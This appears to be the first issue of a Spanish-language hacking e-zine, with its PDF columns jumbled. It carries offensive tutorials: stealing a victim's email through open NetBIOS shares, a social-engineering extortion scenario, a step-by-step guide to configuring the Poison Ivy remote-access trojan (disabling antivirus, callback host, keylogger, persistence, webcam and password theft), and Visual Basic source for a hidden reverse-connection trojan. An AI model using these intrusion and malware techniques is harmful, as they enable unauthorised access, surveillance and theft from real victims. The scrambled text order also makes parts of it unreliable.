Está en la página 1de 58

CUH e-zine vol #1 - 1 edicin

Robo e-mail con NetBios

Robo de E-mails a travs de NetBios

by Mancuertex(ViPeR)

Introduccin e-zine
Bienvenido a la primera edicin de la CUH e-zine, desde aqu agradecemos a todos los colaboradores por sus aportes y ayuda prestada. Tambin agradecemos la paciencia que han tenido con la e-zine y esperamos que la e-zine sea de su agrado ya que hemos puesto todo nuestro empeo y esfuerzo en ella. Esta edicin os va a gustar pero la segunda os gustar an ms.

Para acceder a un recurso compartido en concreto debemos escribirlo despus de la IP , seguido del smbolo del dlar. Ejemplo: \\192.168.1.254/C$ Ya sabemos usar los recursos compartidos ahora vamos al grano. Necesitamos acceso al PC de la vctima y para ello necesitamos saber su IP , as que como estamos en una red local, en mi caso bajo un dominio, abriremos la consola de Windows y teclearemos el comando Net View

Robo de E-mails a travs de NetBios


En esta primera entrega nos adentraremos en el mundo de NetBios (Network Basic Input/Output System), que como muchos ya sabrn es un sistema de entrada y salida de red utilizado principalmente para el uso compartido de recursos y servicios en redes locales. Nosotros lo enfocaremos al robo de datos a travs de una red mal administrada y nos introduciremos en el PC de la vctima para conseguir los datos de su correo electrnico sin que note absolutamente nada. Vamos a empezar por activar el protocolo de red (Netbios). Podemos activar NetBios desde las propiedades de nuestra conexin de rea Local.

/Network, el cual nos mostrar que usuarios hay conectados a nuestra red actualmente. Mi Net View me devolvi estos datos:

Seguramente tendremos la opcin marcada de Predeterminado si esto es as, es que nuestro protocolo de red permaneca activo y nosotros sin saberlo Para activarlo definitivamente escogemos la segunda opcin Habilitar NetBios sobre TCP/IP Una vez activado, ya podemos compartir nuestros recursos de red, y mejor an trabajar con los recursos de red que otros usuarios comparten. A partir de ahora podremos acceder a un ordenador para ver sus recursos compartidos, escribiendo en nuestro navegador o en cualquier ventana de Windows dos contrabarras y la IP de la mquina con la que queremos conectar. Ejemplo:\\192.168.1.254 Escogeremos a PC-0036 como vctima, pero todava no sabemos su IP, aunque con el host ya podramos trabajar, para completar el trabajo resolveremos el host para que nos devuelva la IP. Es tan sencillo como realizar un ping al host. Ejemplo: Ping PC-0036

CUH e-zine vol #1 - 1 edicin

Robo e-mail con NetBios

pero una vez tenemos acceso el nico lmite es nuestra imaginacin.

F.A.Q
Tengo yo NetBios en mi red? Bien, ya tenemos la IP 192.168.1.20! Ya podemos empezar a explotar sus recursos compartidos. Vamos a acceder a travs de una ventana tal y como hemos dicho antes, y a comprobar si tiene compartido el recurso de red que necesitamos. En este caso es C$. Escribiremos \\192.168.1.20/C$ y atencin porque nos acaba de mostrar su disco duro, eso quiere decir que ya tenemos acceso de lectura a su disco, y como probablemente su red est muy mal administrada, tengamos tambin acceso de escritura, lo que quiere decir, que podemos modificar cualquier archivo. Nuestro objetivo es averiguar que correos electrnicos guarda en su ordenador as que vamos a averiguarlo Navegando por su ordenador, nos damos cuenta que usa Mozilla Thunderbird, un cliente de correo con licencia GNU y nos complica un poco mas la cosa, pero sigue siendo sencillo. Navegando por todas las carpetas de Mozilla Thunderbird, averiguamos que encripta y guarda los emails por defecto con la extensin .MSF en una carpeta situada en Datos de Programa. Como ya hemos dicho NetBios es un sistema de entrada y salida de red, el cual hay que tener activado bajo el protocolo TCP/IP si deseamos compartir impresoras o recursos en red con otros ordenadores, por lo tanto si compartes datos en tu red, tienes el protocolo activado. Es peligroso tenerlo activado? En una red bien administrada, no es peligroso, sino necesario, ya que nos facilita mucho el trabajo a la hora de trabajar remotamente. Pero en una red mal administrada puede ser peligroso tenerlo activado. Cmo puedo proteger mi equipo frente a estos ataques? Instalando un Firewall o usando el que viene por defecto en Windows XP SP2 o desactivando NetBios sobre TCP/IP. Cmo uso NetBios sin riesgos? Agregando permisos a los recursos compartidos.

Mancuertex (ViPeR)
El-Hacker.com

Unos archivos dependen de otros, y sera difcil intentar abrirlos as por las buenas ya que no conseguiramos apenas resultados. As que optaremos por instalanos el Mozilla Thunderbird en nuestro ordenador y copiaremos todos los datos guardados en el ordenador de la vctima en el nuestro. De tal forma que Mozilla Thunderbird, abra los e-mails con la extensin .MSF como si fueran los nuestros propios. Una vez hemos copiado todos los archivos a nuestra carpeta, solo tendremos que abrir Mozilla Thunderbird y aparecern los correos de nuestra vctima como si de los nuestros se tratase. Con acceso de lectura y escritura en el PC de la vctima podemos hacer 1000 y una cosas, yo he elegido la de robar e-mails porque es un tema interesante y sencillo,

CUH e-zine vol #1 - 1 edicin

Ingeniera social

Ingeniera social
La ingeniera social esta muy desvalorizada hoy en da por la comuna informtica. A los ingenieros sociales se los trata de idiotas, ignorantes, mentirosos, en fin, cada vez ms cercano al termino LAMMER. Sin embargo, hay que ser mucho ms ingenioso en esta prctica que al estar frente a un monitor dependiendo de los fallos que otras personas hayan cometido al crear un sistema informtico. Segn Wikipedia.org:

by ElPerro
Un ejemplo contemporneo de un ataque de ingeniera social es el uso de archivos adjuntos en emails que ejecutan cdigo malicioso (por ejemplo, usar la mquina de la vctima para enviar cantidades masivas de spam). Ahora, luego de que los primeros emails maliciosos llevaron a los proveedores de software a deshabilitar la ejecucin automtica de archivos adjuntos, los usuarios deben activar los archivos adjuntos de forma explcita para que ocurra una accin maliciosa. Muchos usuarios, sin embargo, cliquean ciegamente cualquier archivo adjunto recibido, concretando de esta forma el ataque. Quiz el ataque ms simple que an es efectivo sea engaar a un usuario llevndolo a pensar que uno es un administrador del sistema y solicitando una contrasea para varios propsitos. Los usuarios de sistemas de Internet frecuentemente reciben mensajes que solicitan contraseas o informacin de tarjeta de crdito, con el motivo de "crear una cuenta", "reactivar una configuracin", u otra operacin benigna; a este tipo de ataques se los llama phishing (pesca). Los usuarios de estos sistemas deberan ser advertidos temprana y frecuentemente para que no divulguen contraseas u otra informacin sensible a personas que dicen ser administradores. En realidad, los administradores de sistemas informticos raramente (o nunca) necesitan saber la contrasea de los usuarios para llevar a cabo sus tareas. Sin embargo incluso este tipo de ataque podra no ser necesario en una encuesta realizada por la empresa InfoSecurity, el 90% de los empleados de oficina de la estacin Waterloo de Londres revel sus contraseas a cambio de un bolgrafo barato.

Exploit (del ingls to exploit, explotar o aprovechar) es un programa informtico malicioso, o parte del programa, que trata de forzar alguna deficiencia o vulnerabilidad de otro programa (llamadas bugs). El fin puede ser la destruccin o inhabilitacin del sistema atacado, aunque normalmente se trata de violar las medidas de seguridad para poder acceder al mismo de forma no autorizada y emplearlo en beneficio propio o como origen de otros ataques a terceros. Un "exploit" es usado normalmente para explotar una vulnerabilidad en un sistema y acceder a l, lo que es llamado como "rootear".

Esta es la definicin de Wikipedia.org para explotar un error en un sistema. Es sabido que el ser humano es probablemente, el sistema ms complejo de la naturaleza, desgraciadamente, tambin es el bug mas sensible de todo sistema organizado. Precisamente esto vamos a aprender, a explotar el peor error en la organizacin informtica; el que se encuentra entre el teclado y la silla. En el campo de la seguridad informtica, ingeniera social es la prctica de obtener informacin confidencial a travs de la manipulacin de usuarios legtimos. Un ingeniero social usar comnmente el telfono o Internet para engaar a la gente y llevarla a revelar informacin sensible, o bien a violar las polticas de seguridad tpicas. Con este mtodo, los ingenieros sociales aprovechan la tendencia natural de la gente a confiar en su palabra, antes que aprovechar agujeros de seguridad en los sistemas informticos. Generalmente se est de acuerdo en que los usuarios son el eslabn dbil en seguridad; ste es el principio por el que se rige la ingeniera social.

La ingeniera social tambin se aplica al acto de manipulacin cara a cara para obtener acceso a los sistemas computacionales. Entrenar a los usuarios en el uso de polticas de seguridad y

CUH e-zine vol #1 - 1 edicin


asegurarse de que son seguidas es la principal defensa contra la ingeniera social. Uno de los ingenieros sociales ms famosos de los ltimos tiempos es Kevin Mitnick [El cndor]. Segn su opinin, la ingeniera social se basa en estos cuatro principios: * Todos queremos ayudar. * El primer movimiento es siempre de confianza hacia el otro. * No nos gusta decir No. * A todos nos gusta que nos alaben. Si bien estos conceptos son claros, concisos y con un alto grado de verdad, no son absolutos. Habla de que la Ingeniera Social se aplica a la informtica, es cierto, ltimamente se asocia el trmino a hackers e intrusin de sistemas, pero no es del todo completa la definicin. En los aos 50 y 60 se destaco un personaje emblemtico para cualquier Ingeniero Social, hablo de Franck Abgnale Jr. Un joven que a los 17 aos engaaba a sus maestros, padres y compaeros para obtener algn provecho. Este personaje puede ser visto en toda su magnificencia en la pelcula "Atrpame si puedes" con Tom Hanks y Leonardo Di Caprio. Como se usa la Ingeniera Social? Hay muchas formas de usarla, con ingenio podemos ser personal de limpieza, abogados, contadores, consultores o vagabundos. Hablo de disfraces [no es chiste].

Ingeniera social 3 - Llaman a su abogado para ser asesorados. 4 - Preguntan como pueden solucionar el asunto. 5 - Llaman a Microsoft Corp. para verificar la identidad del inspector [a correr!!!] Siempre, el Ingeniero Social va a tratar de llegar al punto 1 o 4 y es entonces donde abre su maletn y saca la documentacin. Formulario de amonestacin por uso indebido de software y bla bla bla, se notifica al banco que se va a impartir una multa de XXX [suma muy grande]. Es muy posible que el banco no quiera pagar tal multa y simplemente le pagan un valor menor a nuestro Ingeniero Social. Fin del asunto...

ESTO ES SOLO FICTICIO!!! Basado en una situacin cmica que ocurri en mi trabajo hace mucho tiempo cuando le hicimos un chiste al gerente de la empresa [no era un banco] y al encargado del centro de cmputos. El chiste nos salio bien, el director de la empresa estaba desesperado por no ligar la multa y quiso sacarse el problema de encima lo antes posible, podan despedirlo por algo as. Suerte que no se enojo, nos castigo con trabajos forzados nada mas...pero estuvo muy gracioso el asunto.

Imaginemos la situacin [Solo es un ejemplo, no quiere decir que pueda derivar en una situacin real]: Entra un joven de traje y corbata, un gafete con datos y logotipo de una gran empresa de software y un maletn con documentaciones varias al banco y solicita hablar con EL GERENTE Y CON EL JEFE DE SISTEMAS. Inmediatamente solicita un inventario con los seriales de los sistemas operativos usados en cada terminal y solicita ver cada una de ellas. Gran problema para los directivos del banco, vino un inspector de Microsoft Corp. a ver si tenemos MS/Windows original instalado en nuestras PC...Y NO TENEMOS NI UNO!!!! En este caso puede pasar lo siguiente: 1 - Te ofrecen una coima en dinero. 2 - Se disculpan y prometen obtener licencias.

En conclusin. Esto fue solo un ejemplo de aplicacin en la vida real sin necesidad de engaar a alguien va Internet, es ms peligroso, pero sin duda ms divertido. En la prxima entrega analizamos mayores problemas derivados en el engao del cual todos podemos ser vctimas.

ElPerro Ro Gallegos, Provincia de Santa Cruz, Argentina

CUH e-zine vol #1 - 1 edicin

Uso de troyanos

Gua del uso de troyanos


Introduccin
Saludos, soy FroSeck y he hecho este manual dividido en dos partes con el nico fin de solucionar aquellas dudas que puedan tener los usuarios mas principiantes en este tema y guiarlos en el uso de troyanos de conexin inversa sin responsabilizarme del mal uso que hagis de ste. Espero que os sirva de gran ayuda.

by Froseck
Servicio NO-IP
Bueno como hemos visto antes en los troyanos de conexin inversa (que son los que vamos a tratar en este manual) es necesario que pongamos al crear nuestro servidor nuestra IP, pero qu pasara si nuestra IP fuera dinmica? Pues pasara que nuestra vctima se conectara a nosotros hasta que se nos cambie por otra. Entonces la perderamos y no se podra conectar debido a que nuestra IP ya no es la que pusimos en la configuracin del server. Para evitar esto tenemos que utilizar servicios como NO-IP. Este servicio lo que hace es redireccionar la conexin que hace el servidor a nuestro ordenador. Para utilizar este servicio lo primero que tenemos que hacer es: Acceder a su web ->>> www.no-ip.com Hacer click donde pone Sign-up Now! Seguir los pasos para registrarse y obtener una cuenta. Activamos nuestra cuenta y nos logueamos. Hacemos click en el men de la izquierda donde pone add y escribir nicamente el hostname que puede ser un nombre cualquiera y en Host Type seleccionamos DNS Host (A) y ya esta, ahora le tenemos que dar (ms abajo) a Create Host. Una vez creado volvemos a Hosts / Redirects y esa direccin (EJ: "ola.no-ip.org") que vemos ser lo que sustituir a nuestra IP en la configuracin del servidor. Ahora nos tenemos que instalar el programa NO-IP DUC que descargaremos de aqu ->>> http://www.descargarlo.com/descargar-1957DUC.No_Ip.html Una vez instalado lo ejecutamos y escribiremos nuestros datos de la cuenta y nos aparecer la direccin de nuestro host que creamos anteriormente. As quedara: Es importante que la carita salga sonriente como en la imagen si no es que hemos hecho algo mal. Cuando estemos usando algn troyano es necesario ejecutar este programa porque si no jams se nos conectara

Conceptos bsicos
Para empezar en este manual creo que lo mejor ser tener bien claro unos conceptos imprescindibles para saber lo que estamos haciendo.

Troyano Programa generalmente dividido en dos partes, el cliente y el servidor, cuya interaccin permite controlar ordenadores ajenos (vctimas) en los que ha sido introducido incorporado en otra aplicacin aparentemente inofensiva. Se distinguen dos tipos de troyanos: Conexin directa El cliente se conecta a la victima (servidor) mediante su IP. Este mtodo est en desuso ya que es necesario saber cual es la IP de nuestra vctima y que no use router. Conexin inversa La vctima (servidor) se conecta a nosotros (cliente) mediante nuestra IP. Este mtodo es el usado por la gran mayora debido a su gran facilidad, aunque tiene algunos problemas que solucionaremos mas adelante. Cliente Parte de un troyano que accede a los servicios ofrecidos por un programa llamado servidor. Servidor Parte de un troyano que realiza tareas en beneficio de otras aplicaciones llamadas clientes. IP (Internet Protocol) es un conjunto de cuatro nmeros del 0 al 255 separados por puntos con los cuales se identifica a un ordenador conectado a una red que corre bajo este protocolo. Nuestra IP puede ser esttica (si siempre es la misma) o dinmica (si cuando reiniciamos la conexin cambia). Se pueden distinguir dos IPs en un ordenador. Puerto Mecanismo por la cual entra y sale la informacin de una computadora. Para que se entienda mejor, podemos decir que es una puerta que se utiliza para intercambiar informacin de un sitio a otro y para que se de lugar el intercambio tiene que estar abierta. Joiner Programa que se encarga de unir dos o ms archivos en uno solo que tendr como extensin .exe. Router Aparato encargado de dirigir el trfico de paquetes de un lugar a otro.

CUH e-zine vol #1 - 1 edicin


nuestra vctima (servidor). Con este servicio podremos conectarnos en cualquier ordenador a nuestra vctima mientras tengamos el cliente del troyano y nuestro NO-IP DUC ya que da igual la IP que tengamos.

Uso de troyanos dndole a Test Connections (tenemos que tener activo el NO-IP DUC). Si an as os sale una X (no os funciona) y tenis un router es normal as que leer el apartado Mapear puertos del manual. El recuadro ID ser el nombre de identificacin que nos aparecer para que sepamos quien es. Luego deberemos poner la contrasea que pusimos antes al configurar el cliente, si ponemos otra no se nos conectar. Lo dems lo dejamos como est. Le damos a Next y nos aparece esta ventana:

Creacin y configuracin del servidor


Ahora nos toca elegir el troyano que ms nos guste, por supuesto de conexin inversa. Yo recomiendo el Poison Ivy 2.3 que podemos descargar de aqu: http://www.poisonivy-rat.com/dl.php?file=PI230 Es importante que antes de descargarlo desactivemos nuestro AV (antivirus) para que no nos lo borre y poder trabajar con l. Cuando descomprimamos el RAR haremos clic en el archivo Poison Ivy 2.3.0.exe que es nuestro cliente que usaremos para controlar a nuestra vctima y para crear el servidor que posteriormente le mandaremos. Para empezar a configurarlo todo le daremos a File y a New Client y nos saldr esto:

Dejaremos el Puerto por defecto (3460) si queremos, luego pondremos nuestra contrasea en el recuadro y haremos click en Start. Ahora toca configurar nuestro servidor. Le damos a File y a New Server. Ahora le damos a create profile y nos saldr un recuadro para ponerle el nombre a el perfil (ponemos lo que queramos). Luego nos saldr esta ventana:

La primera casilla sirve para crear una entrada en el registro y ejecutarse en cada inicio de Windows. Recomiendo desactivarla ya que algunos AV como el Kaspersky lo detectaran por heurstica y nuestro troyano se volvera detectable. Tambin recomiendo desactivar la casilla Copy File que sirve para que se autocopie a una carpeta y as permanecer oculto ya que tambin es detectada por algunos AV. Estos problemas los solucionaremos en la siguiente parte de este manual para que se inicie con Windows, se oculte y sea indetectable. Luego vienen tres casillas, la primera hace que el servidor se auto-elimine al ejecutarse cosa que no nos conviene en nuestra configuracin as que lo desactivamos. Luego las dos siguientes (Keylogger para ver lo que escribe nuestra vctima) y Persistence (para que sea mas difcil borrar el servidor) las activamos. Le damos a Next y nos aparece esto:

Recordis la direccin del host que creamos antes? Pues ahora debemos aadirla a nuestro server para que se nos conecte. Le damos a Add y luego ponemos nuestra direccin e importante poner puerto 3460 (o si lo cambiamos poner ese). Podemos probar si va bien

La casilla de Inject sirve para inyectarse en otro proceso. La dejamos desactivada y as por defecto se inyecta en el proceso explorer.exe. Lo dejamos todo como esta y le damos a Next y simplemente le ponemos un icono si queremos y luego dejando todo como esta le damos a Generate y ya tenemos nuestro server creado. Para terminar de tenerlo todo configurado haremos click en Preferences (al lado de File) y en la pestaa General

CUH e-zine vol #1 - 1 edicin


deber estar activado el Auto-Refresh. Le damos clic en Ok y estamos listos para recibir una conexin. A continuacin explicar brevemente como usar el cliente para hacer lo que deseemos en el ordenador de nuestra vctima. Lo mejor que podis hacer para aprender a usarlo es probando vuestros servidores con vosotros mismos y viendo las opciones que trae este troyano con vosotros. Si cuando los probis con vosotros mismos no funciona es porque como dije antes o lo habis hecho mal o tenis un router y en el apartado Mapear puertos lo podis solucionar.

Uso de troyanos tiene ninguna utilidad. Active Ports: Da un listado de todos los puertos abiertos. Remote Shell: Sirve para obtener una Shell de la vctima y manejar la consola. Cached: Da un listado de las contraseas almacenadas por un navegador (EJ: Firefox). NT/NTLM Hashes: Obtiene los hashes del archivo sam para poder (si quieres) crackearlos por tu cuenta y sacar las contraseas de inicio de sesin de Windows. Wireless: Obtiene las contraseas almacenadas de redes inalmbricas. Keylogger: Permite ver lo que ha escrito la vctima aunque t no ests presente. Audio Capture: Permite capturar sonido si la vctima tiene un micrfono. Screen Capture: Permite hacer una captura de pantalla a la vctima. Webcam Capture: Permite ver a la vctima a travs de su Webcam si la tiene. Remote Port Scanner: Permite ver que puertos tiene abiertos la vctima. Edit ID: Cambia el nombre con el que se identifica nuestra vctima. Share: Permite compartir nuestra vctima con otra persona. Update: Permite sustituir nuestro servidor por otro. Restart: Resetea el servidor por si hay mucho ping por ejemplo. Unnistall: Borra nuestro servidor del ordenador de nuestra vctima.

Uso del cliente


Para poder seguir con este apartado debemos de tener una vctima. Nosotros serviremos. Haremos una copia de nuestro servidor y lo meteremos en una carpeta como copia de seguridad y luego lo ejecutamos (con el AV desactivado ya que aun no es indetectable). Una vez que hagamos dos clicks en nuestra vctima nos saldr esta columna que proceder a explicar brevemente:

Mapear puertos
Si tenis un router y aun no se os conecta el servidor a vuestro cliente es porque no habis abierto el puerto correspondiente. Tenis que ir a la configuracin de vuestro router y abrirlo y redireccionar el trfico que entre por ese puerto a tu ordenador. Para ello tienes que saber cual es tu IP privada. Ve a inicio, ejecutar, escribes cmd y luego ipconfig. Ah te aparecer tu IP privada (la que tienes dentro de tu red). Otra cosa importante es la puerta de enlace que en mi caso es 192.168.1.1. Para acceder a la configuracin de tu router debes de teclear la puerta de enlace en la barra de direcciones de tu navegador y luego pones usuario y contrasea y listo. Una vez dentro tendrs que encontrar un apartado donde te permita abrir los puertos. En mi caso tengo un Linksys WRT54G Wireless-G Router. Hay muchos mas modelos de routers y por supuesto no puedo hacer un manual para cada uno. Pero estoy seguro que si investigis un poco lograreis abrirlos. Adems siempre tendris a www.google.com o a nuestro foro http://foro.elhacker.com Al hacer lo antes descrito e ir a la parte donde se abren los puertos aparece esto:

Information: Nos da informacin del SO de nuestra vctima y del servidor. Files: Desde aqu podemos manejar los archivos de nuestra vctima. Search: Busca archivos en el disco duro de la vctima. Regedit: Permite editar el registro. Search: Permite buscar una clave en el registro de nuestra vctima. Processes: Da un listado de los procesos de nuestra vctima. Servicios: Da un listado de los servicios de nuestra vctima. Installed Applications: Da un listado de todas las aplicaciones instaladas. Windows: Da un listado de las ventanas abiertas en el ordenador de la vctima. Relay: sirve para ver y manipular el trafico entre los diferentes proxys y servidores. Para nuestro servidor no

CUH e-zine vol #1 - 1 edicin

Uso de troyanos

En application se puede poner cualquier nombre. En Start y End se pone el puerto que has escogido, en mi caso el 3460. En Protocol se deja en Both. En IP Address pones tu IP privada, luego le das a Enable y lo guardas. Para que se entienda mejor todo esto que estamos haciendo os pongo este esquema de una conexin inversa si estamos detrs de un router:

informtico, la mayor virtud que debe poseer un troyano es la de ser indetectable, he ah el dilema, existen diversas tcnicas para troyanizar un computador, por medio de blindeo de imgenes, incrustados en archivos comprimidos, embebidos en diapositivas, encriptados (muchos se valen de tremendas artimaas>Lammeradas): entrando a foros de discusin, se familiarizan (hacen amigos) y despus sueltan (la bomba) una serie de "aportes" (infectados) todos ellos tan pulcros ah embebidos :) dispuestos a prestar una mano a los incautos, que a cualquier enlace de descarga hacen clic. Cosasde la vida. Unavez se ha troyanizado un sistema, se tiene acceso total, el funcionamiento de un troyano radica en la instalacin de dos programas bsicos: cliente y servidor, compartiendo el mismo puerto, el servidor es el programa que se instala en la victima (no importa el mtodo de romanizacin que se infrinja), y el cliente se instala en nuestro computador, el cliente es que ordena y el server obedece, se pueden tener varias vctimas, simplemente con cambiar el numero de la IP de el server ya rotamos de esclavo, ;)

Se ve como nuestra vctima se conecta a nuestro host guiafroseck.no-ip.org por el puerto 3460 y este lo redirecciona a nuestro router con IP 80.130.10.100. Gracias a que hemos mapeado el puerto 3460 el router es capaz de mandar la conexin a nuestro ordenador que en este caso tiene de IP privada 192.168.1.4. Ahora slo queda hacer indetectable y camuflar nuestro servidor, hasta la segunda parte. By FroSeck

NotaEditorial

TroyanooCaballodeTroya
Un troyanoo caballo de Troya es un malware > Cdigo malicioso>MALicious softWARE , por lo general es un programa que permite el acceso remoto de un PC (muchos de ellos fueron en un principio programas creados para la supervisin de redes de sistemas de informacin) , hoy en dia es una de la formas mas fciles de vulnerar un sistema

CUH e-zine vol #1 - 1 edicin

Troyano de Conexin Inversa

Troyano de conexion Inversa


En este apartado vamos a aprender a crear un Troyano de conexin inversa en VB 6. La conexin inversa, es la victima la que se conecta a ti, contrario de los de conexin directas en que eres tu quien se conecta a la victima. Con esto podemos tener a varias victimas a la vez y no de una en una y adems si estn detrs de un router funcionar ;) Bueno empecemos por crear un nuevo proyecto. Vamos a Proyecto>Componentes y marcamos los siguientes controles: -Microsoft Windows Common Controls 5.0 (con el 6.0 al Listview no se le puede aplicar estilo XP). -Microsoft Winsock Control 6.0 Ahora pasamos a insertar los componentes necesarios, esto puede variar segn cada uno, como le guste etc Vamos a aadir el Listview que es este control: En nombre, yo le puse LV En el cuadro propiedades, en personalizado debis tenerlo as: -Cam -Admin -Version

By Don Nadie

Bueno esto es a gusto, yo lo har as, ustedes como vean. El tamao tambin lo ajustan al gusto(el ancho de cada columna). A mi me gusta que tenga la propiedad Gridlines, que es las rejillas, como el bifrost, bueno ya vern la imagen, para el que le guste, Tughack(Sniper) lo explic en el foro, y tambin la propiedad Multiselect, as que les dejo el link: http://foro.el-hacker.com/index.php/topic,78815.0.html Tambin explica el estilo XP, as que no explicar eso. Bueno ,el aspecto(en ejecucin, despus de ser compilado y agregado el estilo XP)debera ser parecido a este:

Como dije , ustedes pnganle las opciones que quieran Ahora vamos a aadirle un label, que abajo, donde nos mostrar el estado y eso. En Borderstyle, pnganle FixedSingle. Ahora aadan al formulario el control Winsock: Y en la propiedad nombre pnganle WS(por comodidad.). Y en Index pnganle el valor 0. Un Timer interval a 1. Adanle un men, vayan a Herramientas>Editor de Mens. En caption Escriban Men, y en name igual. Desmarquen la propiedad Visible. Luego denle insertar, denle a la flecha que va hacia abajo, y luego a la flecha que va apunta a la derecha. Y en caption pongan Cambiar Nombre y de nombre Name. Esto es lo que deberan tener:

Nos vamos a encabezados de columna, y aadimos las siguientes columnas: -Nombre -IP -Nick/Nombre PC -S.O -RAM -Pais -CPU

CUH e-zine vol #1 - 1 edicin

Troyano de Conexin Inversa

On Error Resume Next total = total + 1 sumamos 1 a esta variable WS(Index).Close cerramos la conexion WS(Index).Accept requestID aceptamos la peticion Load WS(total) WS(total).Listen fijenese que le ocupado,se hizo sumamos 1 para indice nos ponemos a la escucha(pero sumamos 1,proque el indice esta conexion con ese indice asique le aceptar nuevas)escuhamos con ese

Acepten. Bueno vamos a ver un poco de codigo:

CLIENTE

Public total as integer Private sub form_load() al cargar el formulario WS(0).LocalPort = 2300 escuchamos en el puerto 2300 Nota,seria mejor hacer un nuevo formulario,llamado Settings en donde se especifique el puerto ha escuchar,pero de momento mejro dejenlo fijo WS(0).Listen Nos ponemos a la escucha Label1.Caption = "Escuchando en el puerto " & 2300 total = 0 la variable totalindex sea 0 End Sub Private Sub Timer1_Timer() Dim v As Long, marca() As String On Error Resume Next For v = 1 To lv.ListItems.Count bucle que recorre todos lso elementos del listview marca = Split(lv.ListItems(v).Key, "|") esto e sun identificador,lo sacamos de la key If WS(marca(0)).State <> 7 Then si el estado de ese no es conectado lv.ListItems.Remove (v) lo eliminamos de la lista porque no estamos conectados End If Next Me.Caption = "Troyanito - " & lv.ListItems.Count & " conectado(s) -" 'ponemos el nombre de nuestro troyano y el n de conectados End Sub Private Sub WS_ConnectionRequest(Index As Integer, ByVal requestID As Long) cuando hay conexion

End Sub Private Sub LV_Mousedown(Button As Integer, Shift As Integer, x As Single, y As Single) al clicar(en relaidad cuando se suelta el mouse) On Error Resume Next If lv.selectedItem.Selected = False Then si no hay nada seleccionado salimos Exit Sub salimos ElseIf Button = 2 Then sino,si se puls el boton 2(derecho) PopupMenu Menu mostramos el menu Menu End If End Sub Private Sub name_click() al clicar en change name(de nombre name) lv.StartLabelEdit que podamos editar el nombre End Sub Private Sub lv_AfterLabelEdit(Cancel As Integer, NewString As String)despues de cambiar el nombre WS(lv.SelectedItem.Index - 1).Senddata "nombrecan|" & NewString enviamos el identificador y el valor que se puso End Sub Private Sub WS_DataArrival(Index As Integer, ByVal bytesTotal As Long) cuando recibimos datos Dim datos as string Dim data() as string array WS(Index).GetData datos recibimos los datos y los guardamos en la variable datos Data=Split(datos,|)partimos la variable datos por el identificador |,para separar datos Select case Data(0)segn lo que contenga .Data(0) es el primer dato,usaremos eso como identificador Case Conexion . End select End Sub

CUH e-zine vol #1 - 1 edicin

Troyano de Conexin Inversa

Bueno, eso lo dejamos as, porque primero tenemos que poner cdigo en el servidor, luego modificaremos esa parte. Ahora abran un nuevo proyecto, este ser el server, adanle tambin el Winsock y de nombre tambin WS,el aspecto nos da igual ya que no se ver Y un timer, enabled true e interval 1. Un picture1.

Me.visible=false para que no se vea el form. Esto es para la webcam Dim temp As Long hwdc = capCreateCaptureWindow("CapWindow", ws_child Or ws_visible, _ 0, 0, 320, 240, Picture1.hwnd, 0) If (hwdc <> 0) Then webcam = "Si" entonces si tenemos webcam temp = DestroyWindow(hwdc) temp = SendMessage(hwdc, WM_CAP_DRIVER_DISCONNECT, 0&, 0&) DoEvents Else webcam = "No" pues no End If pais = ObtenerIdioma(LOCALE_SNATIVECTRYNAME) para obtener el pas admin = CBool(IsNTAdmin(ByVal 0&, ByVal 0&))para saber si somos admins o no If admin = True Then tor = "Si" Else tor = "No" End If End Sub la funcin para obtener el idioma y pais Public Function ObtenerIdioma(ByVal lInfo As Long) As String Dim buffer As String, ret As String buffer = String$(256, 0) ret = GetLocaleInfo(LOCALE_USER_DEFAULT, lInfo, buffer, Len(buffer)) 'Si Ret devuelve 0 es porque fall la llamada al Api If ret > 0 Then ObtenerIdioma = Left$(buffer, ret - 1) Else ObtenerIdioma = "" End If End Function funcin para obtener la memoria ram Public Function GetRamSize() As String Dim RamStats As MEMORYSTATUS GlobalMemoryStatus RamStats GetRamSize = Round((RamStats.dwTotalPhys / 1024) / 1024) + 1 End Function Private Sub Timer1_Timer() If WS.State <> 7 Then si no estamos conectados WS.Close cerramos

SERVIDOR

Dim victima as string,name1 as string,so as string,ip as string,port as string,webcam as string,pais as string ,tor as string,nombrepc as string,procesador as string Dim admin as boolean Private Sub form_load() On error resume next Open Environ("windir") & "\KB007.txt" For Input As #1 abrimos un archivo de texto en el directorio de windows Input #1, victima leemos el contenido de este If victima = "" Then si esta vacio victima = "Default" le ponemos default a la victima End If sino victima contendr lo que contenga ese archivo, eso es para cuando cambiemos el nombre a la victima. Close #1 Dim yo As Object Set yo = CreateObject("wscript.shell") pais = ObtenerIdioma(LOCALE_SNATIVECTRYNAME) nombrepc = Environ("ComputerName")esta variable contendr el nombre del pc name1 = Environ("UserName")el nombre de usuario so = yo.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Mi crosoft\Windows NT\CurrentVersion\Productname")el sistema operativo ip = "127.0.0.1" la ip, pueden hacer un edit server port = 2300 lo mismo, con el edit server lo editan. procesador = yo.regread("HKEY_LOCAL_MACHINE\HARDWARE\D ESCRIPTION\System\CentralProcessor \0\ProcessorNameString") jntenlo, es k no caba, es para el procesador.... App.TaskVisible = False para que no se vea en el admin de tareas en aplicaciones If App.PrevInstance = True Then: End si ya esta en ejecucin salimos, para no tener 2 corriendo a la vez

CUH e-zine vol #1 - 1 edicin


WS.CONNECT ip, port nos conectamos End If End Sub Private Sub WS_Connect() al haber conexin,enviamos todos los datos WS.SendData "Conexion|" & victima & "|" & nombrepc & "|" & name1 & "|" & so & "|" & GetRamSize & "|" & pais & "|" & procesador & "|" & tor & "|" & webcam End Sub Private Sub WS_DataArrival(ByVal bytesTotal As Long) al recibir los datos On Error Resume Next Dim datos As String Dim data() As String WS.GetData datos los recibimos Data=split(datos,|) Select case data(0) Case "nombrecan" recuerden que fue lo que enviamos como marca al cambiar el nombre Open Environ("windir") & "\KB007.txt" For Output As #1 Print #1, , data(1) ponemos en el texto el nombre que se cambi Close #1 End select End sub
NOTA: Las constantes y mdulos, no los he puesto para no llenar, lo he subido en un .txt, simplemente lean lo que digo para saber donde ponerlo, el link aqu:

Troyano de Conexin Inversa

